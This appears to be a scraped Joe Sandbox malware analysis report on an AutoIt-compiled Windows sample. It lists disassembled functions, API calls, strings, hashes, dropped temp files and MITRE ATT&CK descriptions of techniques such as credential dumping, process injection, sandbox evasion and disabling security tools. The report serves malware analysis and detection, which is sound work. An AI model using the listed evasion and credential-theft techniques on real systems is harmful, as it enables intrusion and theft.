Opcode ID: 2f831266a84a60b63d87a8f428dbcaaf14af9d94af57d35422c77cfe99c64cbc
Instruction ID: 78310d6b84a0acf6e25ae9ad3543424529997319de835ed150fbfae982347e68
Opcode Fuzzy Hash: 2f831266a84a60b63d87a8f428dbcaaf14af9d94af57d35422c77cfe99c64cbc
Instruction Fuzzy Hash: 671102705422A5BADB248F528C84EBBFBACFF0A351F10822AFA1586001D3785992D6F0

Function 007C8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Part of subcall function 007CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007CAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007C8E73

Strings

ListBox, xrefs: 007C8E3D
ComboBox, xrefs: 007C8E12

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 0efcb94e4b36ff0d2a0afa32b4fb60dff0a9e9ec2685ed41073329175aa1a79b
Instruction ID: 76615664dffbdd18f0e3aeb145054ab73f990fc7bdc47ef864ff4cd90f810f30
Opcode Fuzzy Hash: 0efcb94e4b36ff0d2a0afa32b4fb60dff0a9e9ec2685ed41073329175aa1a79b
Instruction Fuzzy Hash: ED01B171A01229EB8F18EBA4CC5AEFE7369FF05360B544A1DF839972E1DE395808C751

Function 007D8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007D8DAC
__fread_nolock.LIBCMT ref: 007D8DC1

Strings

EA06, xrefs: 007D8DF3

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: ac61b943517a01858447d4454f55064842df7ea2e09cb61eae20a3080e8985dd
Instruction ID: 73e13544a1dea8d3259accf039f6265303d8dfa284e95864a0d0334c201023e7
Opcode Fuzzy Hash: ac61b943517a01858447d4454f55064842df7ea2e09cb61eae20a3080e8985dd
Instruction Fuzzy Hash: 7D01F971904228BEDF18CAA8D81AEFE7BF8DB15301F00419BF552D22C1E878A60887A0

Function 007C8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Part of subcall function 007CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007CAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 007C8D6B

Strings

ListBox, xrefs: 007C8D35
ComboBox, xrefs: 007C8D0A

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 7dc8b5cb18bdcf447f7fea1ebd954cf827fd9495f0e9cefb8d0d3cbd0fef72e2
Instruction ID: 923ad6764b7fafd8b3400f34fe38e0bda69bf1aab865c30f6cf05e6516aecdcb
Opcode Fuzzy Hash: 7dc8b5cb18bdcf447f7fea1ebd954cf827fd9495f0e9cefb8d0d3cbd0fef72e2
Instruction Fuzzy Hash: C801B171B41109EBCF18EBA0C95AFFE73A8DF19340F10442DB80AA32D1DE585A08D766

Function 007C8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Part of subcall function 007CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007CAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 007C8DEE

Strings

ListBox, xrefs: 007C8DBA
ComboBox, xrefs: 007C8D8F

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 17e6f4f7ceab8658e4f95dabc5214f278283ae0fc96f315221ba4299bf50e97d
Instruction ID: 27984a6da4367704876203fb75b2eea3261eda1d89085ebc39acf40fbdb735f9
Opcode Fuzzy Hash: 17e6f4f7ceab8658e4f95dabc5214f278283ae0fc96f315221ba4299bf50e97d
Instruction Fuzzy Hash: 6201D471B41109F7CF14EBA4C946FFE73A8DF15340F10802DB80AA3291DE195E08D676

Function 007D4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 007D4F46
_wcscmp.LIBCMT ref: 007D4F58

Strings

#32770, xrefs: 007D4F52

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 244eb67ae6680c482a9ae08e06cb60d04c8dce934eed0e0decf63db9e4b00abd
Instruction ID: 312ff3204bc13b3afe1a64dadd630a775fbc27f8a46dcb677c77144613bb3337
Opcode Fuzzy Hash: 244eb67ae6680c482a9ae08e06cb60d04c8dce934eed0e0decf63db9e4b00abd
Instruction Fuzzy Hash: 17E09B3250422867D710A759AC49AA7F7ACEB45B61F010067FD04D2151D9649A5587E4

Function 007AB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 007AB314: _memset.LIBCMT ref: 007AB321

Part of subcall function 00790940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007AB2F0,?,?,?,0077100A), ref: 00790945

IsDebuggerPresent.KERNEL32(?,?,?,0077100A), ref: 007AB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0077100A), ref: 007AB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007AB2FE

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 9e29caf516df870aa06ce331ea6aa22771c5faa2e1a82d16d3c480e3846634d2
Instruction ID: 474b60bc31a942e6720bacffc551a8d8c5c2339f125f7797717c7a1f6eb88e37
Opcode Fuzzy Hash: 9e29caf516df870aa06ce331ea6aa22771c5faa2e1a82d16d3c480e3846634d2
Instruction Fuzzy Hash: CCE0C9702007118ADB609F68E5086567BE8FF85754F008A6DE456C6652EBBCA444CBA1

Function 007C7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007C7C82

Part of subcall function 00793358: _doexit.LIBCMT ref: 00793362

Strings

Error allocating memory., xrefs: 007C7C7B
AutoIt, xrefs: 007C7C76

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: f16d909e980797ce8916b2c6fefb0ed5a5e508fbbb717c969e67fa3bb5eb8cde
Instruction ID: 6ccc901ea86efa0433861980ddd6134e996f230617001e3786095ac38d7aeb8b
Opcode Fuzzy Hash: f16d909e980797ce8916b2c6fefb0ed5a5e508fbbb717c969e67fa3bb5eb8cde
Instruction Fuzzy Hash: 63D012323C431876D51532A97C0AFDA6A488F15B62F04446AFB18995D34DDD898181E9

Function 007B1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 007B1775

Part of subcall function 007EBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,007B195E,?), ref: 007EBFFE
Part of subcall function 007EBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007B196D

Strings

WIN_XPe, xrefs: 007B1788

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: de72b4f4e95c1a7f0286e423e1533e26ef1607b5ebe7ddacafd1fa55030b56fe
Instruction ID: f427496b26176d99d59c76b3997fdc17ac8614a52a6e7a8182352379fa00e426
Opcode Fuzzy Hash: de72b4f4e95c1a7f0286e423e1533e26ef1607b5ebe7ddacafd1fa55030b56fe
Instruction Fuzzy Hash: 3FF0ED70801109DFDB15DB95C998BECBBF8BF08305FA44095E102A3190DB795F84DF64

Function 007F5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007F596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007F5981

Part of subcall function 007D5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D52BC

Strings

Shell_TrayWnd, xrefs: 007F5967

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 70cfa173fa95b010a09120186865c554f46622c44a56bca73352af1516b2c8bd
Instruction ID: ee704c1114d62661d745d09883c156feaf5f2a981d7098706768a72fad12adec
Opcode Fuzzy Hash: 70cfa173fa95b010a09120186865c554f46622c44a56bca73352af1516b2c8bd
Instruction Fuzzy Hash: EAD0C931384311B7E664AB70AC0FFA66A24BF10B50F004825F259EA2D0CDE8A804C658

Function 007F5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007F59AE
PostMessageW.USER32(00000000), ref: 007F59B5

Part of subcall function 007D5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D52BC

Strings

Shell_TrayWnd, xrefs: 007F59A7

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a9218f56ae05ae5d26a993ac038db975e69e5c6e1eb334e71b51db532179987f
Instruction ID: 22cef95112b7d1e685299c9d5a70ed916a480731a517cf623a86457cc1b9fdf7
Opcode Fuzzy Hash: a9218f56ae05ae5d26a993ac038db975e69e5c6e1eb334e71b51db532179987f
Instruction Fuzzy Hash: 19D0C931381311BBE664AB70AC0FFA66624BF14B50F004825F255EA2D0CDE8A804C658

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gKvjKMCUfq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\745o5K385

C:\Users\user\AppData\Local\Temp\aut8EF2.tmp

C:\Users\user\AppData\Local\Temp\nonplacental

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
gKvjKMCUfq.exe

Function 00773B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 007749A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00774E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 007D9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 0077301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00773041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0077708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00773A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00773633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00773766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

